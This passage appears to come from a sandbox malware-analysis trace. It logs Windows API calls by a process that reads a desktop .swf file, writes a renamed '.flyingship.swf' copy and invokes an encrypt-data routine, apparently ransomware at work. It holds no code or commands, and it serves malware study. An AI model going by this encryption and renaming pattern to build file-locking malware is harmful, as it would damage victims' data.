lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.554] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.554] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0075.554] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.554] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\wwhoeeriour.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.554] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.554] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.555] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1080 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1080 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.555] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.555] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.555] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.556] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.556] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.556] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.556] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.556] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x69bce0 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d730 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69bce0 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0075.557] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd")) returned 0x10 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.557] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.558] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.558] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.558] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.558] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.558] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.558] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.558] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.558] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\wwhoeeriour.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.582] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1080 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1080 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0075.582] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0075.582] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0075.583] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0075.584] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.584] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x68eb, lpOverlapped=0x0) returned 1 [0075.586] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.587] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68eb) returned 0x6a1080 [0075.587] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.588] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.588] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68eb) returned 0x795ff8 [0075.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1080 | out: hHeap=0x650000) returned 1 [0075.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.589] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.589] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68eb) returned 0x6a1080 [0075.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1080 | out: hHeap=0x650000) returned 1 [0075.589] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.590] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.590] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.590] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.590] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb498 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.590] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68eb) returned 0x6a1080 [0075.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb418 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5b8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5f8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.591] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b198 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.591] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x68eb) returned 0x79c8f0 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.592] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.592] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.593] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0075.593] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.593] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.593] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.593] RtlAllocateHeap 